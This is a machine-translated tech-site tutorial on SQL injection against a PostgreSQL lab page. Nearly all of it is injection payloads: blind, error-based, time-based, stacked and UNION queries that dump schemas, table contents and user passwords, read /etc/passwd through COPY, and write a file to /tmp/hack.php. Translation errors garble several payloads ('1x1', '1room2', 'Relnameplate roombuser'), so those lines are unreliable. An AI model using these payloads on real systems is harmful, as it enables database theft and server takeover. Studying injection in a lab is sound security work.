In addition to Weibo, there is also WeChat
Please pay attention
WeChat public account
Shulou
2025-04-04 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Network Security >
Share
Shulou(Shulou.com)05/31 Report--
Editor to share with you the example analysis of postgresql injection, I believe that most people do not know much about it, so share this article for your reference, I hope you can learn a lot after reading this article, let's go to know it!
PostgreSQL is a free object-relational database server (ORDBMS) distributed under a flexible BSD license.
PostgreSQL developers pronounce it as post-gress-Q-L.
PostgreSQL's Slogan is "the most advanced open source relational database in the world".
Here we learn about vulnerabilities in the postgresql database through a simple shooting range.
Browsers access data
Here we use docker to build the environment.
Visit our built address: http://172.16.1.238:90/index.php?uid=1
II. Verification injection
Based on Boolean injection (boolean-based blind)
Index.php?uid=1 AND 1x1 is operating normally
Abnormal operation of index.php?uid=1 AND 1room2
Error based injection (error-based)
Get the version number:
Select * from tbuser where id=1 AND 7778=CAST ((SELECT version ()):: text AS NUMERIC)
Get Schemas name
Select * from tbuser where id=1 AND 7778=CAST ((SELECT schemaname FROM pg_tables limit 1):: text AS NUMERIC)
Time-based blind injection (time-based blind)
AND 6489 = (SELECT 6489 FROM PG_SLEEP (5)) delay 5 seconds
Based on stacked queries (multi-statement queries, stacked queries)
? uid=1;select PG_SLEEP (5)-
Based on federated query (UNION query)
? uid=1 order by 1, 2, 3 is running normally.
? uid=1 order by 1, 2, 3, 4 runs abnormally, gets the number of fields 3
? uid=1 UNION ALL SELECT NULL, ('11111'), NULL-- to see if the output is 11111
Get database structure and content
Here are all federated queries
Get the schema name (schemaname) name
? uid=1 UNION SELECT NULL,COALESCE (CAST (schemaname AS CHARACTER (10000)), (CHR (32)), NULL FROM pg_tables--
Syntax parsing:
The COALESCE (expression [, n]) coalesce function returns the field value of the first non-NULL value in the parameter (column name). Note that it is not empty.
Cast ('1' as numeric) 1 converted to numeric type
Simplify:
? uid=1 UNION SELECT NULL,schemaname,NULL FROM pg_tables--
The default schema name (schemaname) of the user-created database is public
Get the data table name
Uid=1 UNION ALL SELECT NULL,tablename,NULL FROM pg_tables WHERE schemaname IN ('public')
Get table field name
? uid=1 UNION SELECT NULL,attname,NULL FROM pg_namespace,pg_type,pg_attribute b JOIN pg_class an ON a.oid=b.attrelid WHERE a.relnamespace=pg_namespace.oid AND pg_type.oid=b.atttypid AND attnum > 0 AND a. Relnameplate roombuser 'AND nspname='public'-
Get table contents
? uid=1 UNION ALL SELECT NULL,id | |','| | username | |','| | passwd,NULL FROM public.tbuser--
III. File or directory operation
Some built-in functions and tables in PostgreSQL
Column directory-only files under the installation directory can be listed
Uid=1 union select NULL,NULL,pg_ls_dir ('. /')
Read the file? uid=1;CREATE TABLE passwd (t TEXT); COPY passwd FROM'/ etc/passwd';SELECT NULL,t,NULL FROM passwd
Write a file? uid=1;DROP TABLE pass; (here you need a table that exists for the database) CREATE TABLE hacktb (t TEXT); INSERT INTO hacktb (t) VALUES (''); COPY hacktb (t) TO'/ tmp/hack.php'
The above is all the content of the article "sample Analysis of postgresql injection". Thank you for reading! I believe we all have a certain understanding, hope to share the content to help you, if you want to learn more knowledge, welcome to follow the industry information channel!
Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.
Views: 0
*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.
Continue with the installation of the previous hadoop.First, install zookooper1. Decompress zookoope
"Every 5-10 years, there's a rare product, a really special, very unusual product that's the most un
© 2024 shulou.com SLNews company. All rights reserved.